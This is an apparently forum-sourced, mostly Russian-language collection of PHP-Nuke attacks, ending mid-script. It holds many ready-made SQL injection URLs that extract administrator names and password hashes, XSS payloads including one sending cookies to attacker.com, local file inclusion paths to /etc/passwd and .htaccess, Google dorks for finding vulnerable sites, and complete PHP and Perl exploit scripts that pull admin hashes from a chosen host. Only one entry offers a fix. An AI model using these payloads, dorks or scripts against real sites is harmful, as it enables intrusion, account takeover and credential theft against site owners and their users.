Обзор уязвимостей PHP-Nuke.

[SQL-Injection]

PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit (http://milw0rm.com/exploits/3346)

PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit (http://milw0rm.com/exploits/3345)

PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql) (http://milw0rm.com/exploits/3344)

PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit (http://milw0rm.com/exploits/2617)

PHP-Nuke 7.5 - 7.8 (Search) Remote SQL Injection Exploit (http://milw0rm.com/exploits/1523)

PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit (http://milw0rm.com/exploits/1326)

PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit (http://milw0rm.com/exploits/1270)

PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit (http://milw0rm.com/exploits/1219)


[Remote File Inclusion]

PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability (http://milw0rm.com/exploits/4563)

PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions (http://milw0rm.com/exploits/1866)


[XSS]

PHP-Nuke versions: 8.0 (by ettee)

Example:

[target]/modules.php?name=Search&query=<script+src=http://someshit.net/xss.jpg+

xss.jpg:
alert (document.cookie);

PHP-Nuke versions: 7.8

Example:
http://site.com/?pagetitle=title


[Modules Vulns]

PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln (http://milw0rm.com/exploits/4667)

PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability (http://milw0rm.com/exploits/4447)

PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit (http://milw0rm.com/exploits/3683)

PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability (http://milw0rm.com/exploits/3591)

PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit (http://milw0rm.com/exploits/3582)

PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln (http://milw0rm.com/exploits/3524)

PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion Exploit (http://milw0rm.com/exploits/3518)

PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability (http://milw0rm.com/exploits/3423)

PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit (http://milw0rm.com/exploits/3334)

PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit (http://milw0rm.com/exploits/2843)



[DB Structure]

(cms)
[nuke_authors]
name
email
pwd
radminsuper
Hash = md5(pwd)

(forum)
[nuke_users]
username
user_email
user_icq
user_password
user_newpasswd
Hash = md5(user_password)


[Default Paths]

Admin:
[target]/admin.php

Config:
[target]/config.php

Уязвимости в скриптах autohtml.php и autohtml0.php в параметре filename.

[Local File Inclusion]

http://site/autohtml.php?filename=../file.php

http://site/autohtml0.php?filename=../file.php

[Information Leakage]

http://site/autohtml.php?filename=../.htaccess

http://site/autohtml0.php?filename=../.htaccess

С помощью локального инклюда можно обнаружить важную информацию на сервере. В частности в .htaccess можно узнать настройки сайта, в том числе полный путь (что будет full path disclosure), при использовании NukeSentinel на сайте. А также можно обнаружить путь к его конфигурации и получить логины и хэши админов.

[Full path disclosure]

http://site/autohtml.php?filename=12345

На некоторых сайтах с данным скриптом, где не отключено выведение ошибок, при указании несуществующего файла выводится сообщение об ошибке с полным путём к скрипту.

(c) MustLive <mustlive_(at)_websecurity.com.ua>

XSS
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253c/script>bar
modules.php?name=News&file=friend&op=StorySent&title=%253cscript>alert%2528document.cookie);%253c/script>
modules.php?name=Reviews&rop=postcomment&title=%253csc ript>alert%2528document.cookie);%253c/script>
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=<body onload=document.title=1337>
modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script><
modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=
modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>
modules.php?name=Web_Links&l_op=NewLinks&newlinkshowdays=
modules.php?name=Journal&file=friend&jid=2&yun=
modules.php?name=Journal&file=friend&jid=2&ye=
modules.php?name=Journal&file=add&filelist[]=
modules.php?name=Journal&file=modify&filelist[]=
modules.php?name=Journal&file=delete&jid=&forwhat=waraxe
modules.php?name=Journal&file=comment&onwhat=
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=
modules.php?name=Encyclopedia&op=terms&eid=1&ltr=
modules.php?name=Encyclopedia&op=content&tid=774&page=2&query=
modules.php?name=Encyclopedia&file=search&eid=
modules.php?name=Encyclopedia&file=search&query=f00bar&eid=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&url_title=foobar&url=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003@bar.org&reviewer=f00bar&cover=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&rlanguage=
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00@bar.org&reviewer=f00bar&hits=
modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=00@b.org&reviewer=
modules.php?name=Reviews&rop=savecomment&uname=&id=8&score=9
modules.php?name=News&file=article&sid=1&optionbox=
modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=
modules.php?name=Stories_Archive&sa=show_month&year=&month=05&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=&month_l=May
modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=&order=0&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0
modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=
modules.php?name=NukeJokes&func=CatView&cat=
modules.php?name=NukeJokes&func=JokeView&jokeid=
modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
modules.php?name=Downloads&d_op=viewsdownload&sid=
modules.php?name=Search&sid=
modules.php?name=Search&query=*&max=
modules.php?name=Search&query=waraxe&sel1=[xss]&type=comments
modules.php?name=Search&a=6&query=*&match=
modules.php?name=Search&query=*&mod3=
modules.php?name=Calendar&file=submit&type=
modules.php?name=Calendar&file=submit&op2=Preview&day=
modules.php?name=Calendar&file=submit&op2=Preview&month=
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]
modules.php?name=NukeJokes&func=CatView&cat=[xss code here]
modules.php?name=NukeJokes&func=JokeView&jokeid=[xss code here]
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2
modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2
modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]
banners.php?op=EmailStats&login=[our_login]&cid=1&bid=
modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=

<html>
<form name=searchform method=post action=http://[target]/modules.php?op=modload&name=Search_Enhanced&file=index>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>


Search Module(all versions)
<img src=http://www.microsoft.com/404.jpg style=display:none onerror=alert(document.cookie) <
<iframe src=http://www.google.com style=display:none onload=alert(document.cookie) <

Pool and News Module
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"

SQL injection:
modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p wd,url,url,10000,name%20FROM%20nuke_authors/*
modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a uthors
modules.php?name=Sections&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_aut hors%20WHERE%201/*
modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1%20UNION%20SELECT%20username,1,user_password,user _id%20FROM%20nuke_users
modules.php?name=Downloads&d_op=viewdownloadcomments&lid=-1%20UNION%20SELECT%20username,user_id,user_passwor d,1%20FROM%20nuke_users/*
modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u sers%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20SELECT%20user_password%20FROM%20nuke_u sers%20WHERE%20user_id=5
modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_passw ord,name,user_email,user_level,0,0%20FROM%20nuke_u sers
modules.php?name=Downloads&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_passwor d%20FROM%20nuke_users/*
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_ authors
modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_aut hors/*
modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20n uke_authors
modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho rs
modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_autho rs%20LIMIT%201,2
modules.php?name=NukeJokes&file=print&jokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1
modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

Full Path Disclosure
modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=00@b.org&reviewer=oob&date=00b
/modules/Web_Links/voteinclude.php
/modules.php?name=Statistics&op=convert_month
/modules.php?name=Journal&file=add&filelist=oob
/modules.php?name=Journal&file=modify&filelist=oob
/db/db.php
index.php?inside_mod=1
/modules.php?name=Downloads&d_op=menu
/modules.php?name=Web_Links&l_op=menu
modules.php?name=Web_Links&l_op=viewlink&cid=1&show=oob
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=oob
modules.php?name=NukeJokes&func=CatView&cat=oob
modules.php?name=Downloads&d_op=viewdownload&cid=2&show=oob
modules/Calendar/config.php
modules/Calendar/index.php
/modules/Calendar/submit.php
error.php?newlang=foobar
modules/coppermine/include/crop.inc.php
modules/coppermine/ecard.php
modules/coppermine/displayecard.php
modules/coppermine/db_input.php
modules/coppermine/config.php
modules/coppermine/addpic.php
modules/coppermine/phpinfo.php
modules/NukeJokes/mainfunctions.php
modules.php?name=NukeJokes&func=JokeView&jokeid=foobar
modules.php?name=NukeJokes&func=CatView&cat=foobar
modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho
modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

dork:
"create the Super User" "now by clicking here"
inurl:"modules.php?name=" inurl:Web_Links|inurl:downloads|inurl:Your_Account
intext:"Thank you for trying PostNuke" intitle:"PostNuke Installation"
"Warning: setlocale()"
intitle:PHP-nuke.powered.site "create * Super User" "now * clicking here"
"Powered by PHP-Nuke"
Copyright © 2003 by PHP-Nuke
"allinurl:modules.php sgallery"
"powered by phphnuke 6.0"
intitle:"PHP-Nuke Powered Site"

Remote SQL Injection

Vulnerable: PHP-Nuke <= 8.0

Exploit:


<?php
################################################## ########
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
################################################## ########
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
################################################## ########

if (isset($_POST['Submit'])){
$result=sendit('CONCAT("::",aid,"::",pwd,"::")');
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
{$ahash = $matches[2]; $aname = $matches[1];}

}

function sendit($param){
$prefix = $_POST['prefix'];
$data = $_POST['sql_text'];
$host = $_POST['hostname'];
$page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) die("$errstr ($errno)\n");
fputs($sock, "$method /$page HTTP/1.0\r\n");
fputs($sock, "Host: $host" . "\r\n");
fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-length: " . strlen($data) . "\r\n");
fputs($sock, "Referer: $ref_text". "\r\n");
fputs($sock, "User-Agent: $user_agent" . "\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "\r\n");
fputs($sock, "$data\r\n");
fputs($sock, "\r\n");

while (!feof($sock)) {
$result .= fgets ($sock,8192);
}
fclose($sock);
return $result;

}


?>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
<TITLE>RST/GHC PHP Nuk'em exploit</TITLE>
<style>
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
</style>
<body bgcolor="#525254">
<form method=post>
<p class="style2"><font size="3" face="Arial, Helvetica, sans-serif">PHP Nuke <span class="style3">QUERY MANIPULATOR</span> based on <font size="3" face="Arial, Helvetica, sans-serif">`sid` POST sql injection</font> exploit for Search module </font></p>
<table width="900" border="0">
<tr bgcolor="#FFFFFF">
<td width="12%"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Parameter</font></strong></td>
<td width="88%" bgcolor="#FFFFFF"><span class="style5"><font size="2" face="Arial, Helvetica, sans-serif">Value</font></span></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">url
</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="hostname" type="text" id="hostname" value="<?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">dir</font>
</strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="dir" type="text" id="dir" value="<?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">referer</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="ref_text" value="<?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930">SQL query</td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="sql_text" value="<?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_ authors%20WHERE%20radminsuper=\'1'; ?>" size="80">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">user
agent</font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input type="text" name="user_agent" value="<?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?>" size="60">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">table prefix </font></strong></td>
<td bgcolor="#999999"><font face="Arial, Helvetica, sans-serif">
<input name="prefix" type="text" id="prefix" value="<?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?>">
</font></td>
</tr>
<tr>
<td bgcolor="E39930"><strong><font size="2" face="Arial, Helvetica, sans-serif">method</font></strong></td>
<td bgcolor="#999999"><select name="method" size="1" id="method">
<option value="POST">POST</option>
<option value="GET">GET</option>
</select></td>
</tr>
<tr>
<td bgcolor="E39930">&nbsp;</td>
<td bgcolor="#999999">&nbsp;</td>
</tr>
</table>
<p>
<input type="submit" name="Submit" value="rock-n-roll">
</p>
</form>




<font size="2">(c) RST/GHC</font>

<hr size="3">
<?
# DEBUG

print $result;
?>

# milw0rm.com [2008-01-22]

Remote SQL Injection

PHP-Nuke < 8.0

Exploit

<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);

echo '
+=========================================+
| RST/GHC unpublished PHP Nuke exploit <8 |
+=========================================+
<+> version <8.0
<+> Tested on 7.9 & 6.0
';

if ($argc < 2){
print "Usage: " . $argv[0] . " <host> <version> [table prefix]\n";
print "ex.: " . $argv[0] . " phpnuke.org 7\n";
credits();
exit;
}


/* few definitions */
if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix
else {$prefix = $argv[3];}

switch ($argv[2]){
case "6":
$query ="modules.php?name=News&file=article&sid=99999999+UNION+SELECT+null%20as%20catid,pwd%20 as%20aid,null%20as%20time,pwd%20as%20title,null%20 as%20hometext,aid%20as%20bodytext,null%20as%20topi c,null%20as%20informant,null%20as%20notes,null%20a s%20acomm,%20null%20as%20haspoll,null%20as%20pollI D,null%20as%20score,null%20as%20ratings%20FROM%20% 60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1'";
$version = 6;
break;
default:
$query ="modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%2 0as%20aid,null%20as%20time,pwd%20as%20title,null%2 0as%20hometext,aid%20as%20bodytext,null%20as%20top ic,null%20as%20informant,null%20as%20notes,null%20 as%20acomm,%20null%20as%20haspoll,null%20as%20poll ID,null%20as%20score,null%20as%20ratings%20FROM%20 %60".$prefix."_authors%60%20WHERE%20%60radminsuper%60%20='1";
$version = 7;
break;
}

$host = 'http://' . $argv[1] . '/'; # argv[1] - host
$http = $host . $query;
echo
'[+] host: '.$host . '
[+] nuke version: '.$version.'
';
#DEBUG
//print $http . "\n";

$result = file_get_contents($http);

preg_match("/([a-f0-9]{32})/", $result, $matches);
if ($matches[0]) {print "Admin's Hash: ".$matches[0];
if (preg_match("/(?<=\<br\>\<br\>)(.*)(?=\"\<\/i\>)/", $result, $match)) print "\nAdmin's name: " .$match[0];}
else {echo "Exploit failed...";}

credits();


function credits(){
print "\n\n+========================================+\n\r Coded by Foster \n\r Copyright (c) RST/GHC";
print "\n\r+========================================+\n";
exit;
}

?>

# milw0rm.com [2008-01-22]

PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability

example

http://www.xxxx/modules.php?op=modload&name=books&file=index&req=view_cat&cid={exploit}


EXPLOIT 1 :

-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(111,112,101,114,110,97,108,101,51),concat(pn_ uname,0x3a,pn_pass)+from%2F%2A%2A%2Fnuke_users/*where%20admin%201=%201

EXPLOİT 2 :

-90900%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(121,122,111,104,110,97,112,101,54),concat(pn_ uname,0x3a,pn_pass)+from%2F%2A%2A%2FpostNuke_users/*where%20admin%201=%201

(c)milw0rm.com

PHP-Nuke Module Sections (artid) Remote SQL Injection

SQL Injection

Пример:

www.xxX/xxxxSections&op=viewarticle&artid=(exploit)

Код:

9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

Для поиска сайтов с этим модулем:

allinurl: "имя секции"

(c) (http://www.hackturkiye.com)

PHP-NUKE Modules Okul v1.0 Remote SQL Injection

SQL Injection

modules.php?name=Okul&op=okullar&okulid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*


PHP-Nuke Module Inhalt (cid) SQL Injection

SQL Injection

modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/aid,2/**/from/**/nuke_authors/*where%20admin%20-2


modules.php?name=Inhalt&sop=listpages&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

(c) biyofrm.com

PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection

SQL Injection

modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*


PHP-Nuke Module Siir (id) Remote SQL Injection

SQL Injection

modules.php?name=Siir&op=print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

Для поиска

allinurl: modules-php-name-Siir

(c) s@bun

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

PoC:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability

Exploit_:
modules.php?name=Kose_Yazilari&op=viewarticle&artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu ke_authors


Exploit_2:
modules.php?name=Kose_Yazilari&op=printpage&artid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_a uthors



(c) milw0rm.com

SQL Injection

Exploit:


modules.php?name=Sell&d_op=viewsell&cid=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202

SQL Injection

Exploit:


modules.php?op=modload&name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

XSS
Заходим на http://rus-phpnuke.com/ в поле поиска вбиваем
"><iframe src="javascript:alert(document.cookie);" <
и видим куки.
Ксс в первом посте найденая ettee не пройдет, т.к. там стоит жесткая фильтрация гета, или только кодированием.

Sql inj modules 4nAlbum
File http://rus-phpnuke.com/modules.php?name=Files&go=view_file&lid=198
example:
http://site.name/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=[exploit]
Injection:
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/1,2,concat(aid,%22:%22,pwd),4,5,6,7/**/from/**/nuke_authors/*where%20admin%20-2/*

зы сплойты пойдут лесом если их правильно не закодировать. ^__^
{c}gibson

Exploit:

-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors +where+radminsuper=1

modules.php?name=gaestebuch_v22&func=edit&id=-1+union+all+select+1,1,1,
aid,pwd+from+nuke_authors+where+radminsuper=1


Google dork:

allintext:"PHP-Nuke Copyright © 2005 by Francisco Burzi"
allinurl:"gaestebuch_v22&func"

PHP-Nuke Module eGallery "pid" Remote SQL Injection


PoC:

modules.php?name=eGallery&file=index&op=showpic&pi
d=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202


PHP-Nuke Module "seminar" Local FIle Inclusion

PoC:

modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..
/etc/passwd


Google dork:

inurl:"modules.php?name=seminar"

Regards,
The-0utl4w

PHP-Nuke KutubiSitte "kid" SQL Injection

Exploit:

#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
| PHP-NUKE KutubiSitte [kid] => SQL Injection |
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
################################################## #####
# Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
################################################## #####
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:#
#:-------------------------------------------------------:#
:#| USAGE: |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id] |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:#
#:-------------------------------------------------------:#
:#| EXAMPLE: |#:
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#: #:#:#:#:#


");
}
sub problem{
print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
exit();
}
sub exploitation{

$conn = LWP::UserAgent -> new;
$conn->agent('Checkbot/0.4 ');
$query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_auth ors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
$return_pwd = $conn->get($query_pwd) || problem();
$return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
}

getopts(":h:p:U:",\%args);
$host = $args{h} if (defined $args{h});
$path = $args{p} if (defined $args{p});
$user_id= $args{U}if (defined $args{U});

if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
usg();
}
else{
exploitation();
}

Bug found by Lovebug
Exploit coded by r080cy90r from RBT-4

SQL Injection

Exploit:

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2 A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0% 2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2 A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A


Found by Lovebug [rbt-4]

SQL Injection

Vulnerable: Version 3.0

Exploit:

http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),
2/**/from/**/nuke_authors/*where%20admin%20-2


Found by HouSSaMix from H-T Team

SQL Injection

Vulnerable: Module ZClassifieds

Exploit:


modules.php?name=ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,
aid/**/from/**/nuke_authors/*where%20admin1/**


...thx Lovebug...

XSS

Vulnerable: eWeather module

Уязвимый код: в скрипте /modules/eWeather/index.php

Строка 35: $zipCode=$chart;
Строка 47: echo "<div align =\"center\"><h2>USA weather for zip code $zipCode</h2>";

Переменная "chart" не фильтруется.

PoC:

http://example.net/modules.php?name=eWeather&chart=[XSS]


Fix:

Строку 35 заменить на: "$zipCode=(int)$chart;"

by: NetJackal

SQL Injection

Vulnerable: PHP-Nuke Platinum 7.6.b.5

Vuln script: dynamic_titles.php

Exploit:

#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
